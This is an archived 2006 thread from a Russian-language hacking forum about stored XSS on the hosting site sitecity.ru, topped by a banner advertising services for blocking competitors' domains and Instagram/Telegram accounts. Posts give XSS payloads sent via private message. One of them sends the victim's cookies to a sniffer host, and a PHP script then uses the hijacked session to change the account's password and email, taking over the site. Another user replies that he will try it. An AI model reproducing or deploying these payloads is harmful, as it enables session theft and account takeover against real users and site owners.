УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Имеем аккаунт на sitecity.ru (активная XSS)

Опции темы

Поиск в этой теме

Опции просмотра

Имеем аккаунт на sitecity.ru (активная XSS)

26.05.2006, 22:24

~~_kREveDKo_~~

Banned

Регистрация: 04.12.2005

Сообщений: 826

Провел на форуме:
5223479

Репутация: 3813

Имеем аккаунт на sitecity.ru (активная XSS)

Вот две XSS, позволяющие стянуть кукисы с помощью ядовитого письма. (отсылается, когда заходишь под своим аккаунтоми - шлёшь на чужой логин)

<script src="javascript:alert(/ваш сниффер/);"></script>

<iframe BORDER=0 HEIGHT=0 WIDTH=0 src="javascript:alert(/для сниффера тоже/);"></iframe>

26.05.2006, 23:16

WEED

Познающий

Регистрация: 28.03.2006

Сообщений: 90

Провел на форуме:
395323

Репутация: 25

Щас испробуем..............

30.05.2006, 00:24

PinkPanther

[ розовый мафиозо ]

Регистрация: 16.03.2005

Сообщений: 301

Провел на форуме:
1736355

Репутация: 241

Отрывок из моей статьи, кторую я все обещаю выложить, да все никак руки не доходят ))

любой банальный XSS скрипт в ЛС, например:

Код:

<img src="http://sasa" style="background:white url(javascript:document.images[0].src='http://sniff/s.php?'+document.cookie)">

Изменим пароль, имя с фамилией и емейл. (Кстати можно пойти от дефа и аж до удаления сайта, подтверждающих паролей нет нигде)

PHP код:


		
			
<? 
$nick="PinkPanther";
$mail="qwerty@qwerty.ru";
$new_password="123456";
 
$query=$_SERVER["QUERY_STRING"];
$query=urldecode($query);
$refer=getenv("HTTP_REFERER");
$ref1=strpos($refer,"id=")+3; 
$session=substr($refer,$ref1,32); 
 
$post="sid=".$session."&act=send&uname=".$nick."&email=".$m ail."&passwd_1=".$new_password."&passwd_2=".$new_password."&pager_type=non&pager=&lang=rus&gpasswd=&is_news=on&is_notify=on&news_encoding=koi&news_lang=rus&%C8%E7%EC%E5%ED% E8%F2%FC=%C8%E7%EC%E5%ED%E8%F2%FC";
 
$len=strlen($post);
 
$header="POST http://sitecity.ru/adm_base.phtml HTTP/1.0 ";
$header.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* ";
$header.="Referer: http://sitecity.ru/adm_base.phtml?sid=".$session." ";
$header.="Content-Type: application/x-www-form-urlencoded ";
$header.="Host: sitecity.ru ";
$header.="Content-Length: $len ";
$header.="Cookie: ".$query." ";
$header.=" ";
$header.=$post; 
 
$fp=fsockopen("sitecity.ru", 80); 
fwrite($fp, $header); 
fclose($fp); 
?>

Вот так вот. Теперь мы имеем полный контроль над захваченным сайтом.
Еще хочу заметить, что на этом, баги не заканчиваются))

Так же, прочитавших это, по человечески прошу никогда не делать подобное:

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss черви и вирусы: сообщества уязвимых	Utochka	Чужие Статьи	3	28.08.2006 00:26
XSS (passive) на sitecity.ru	_kREveDKo_	Уязвимости	2	20.05.2006 23:03

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход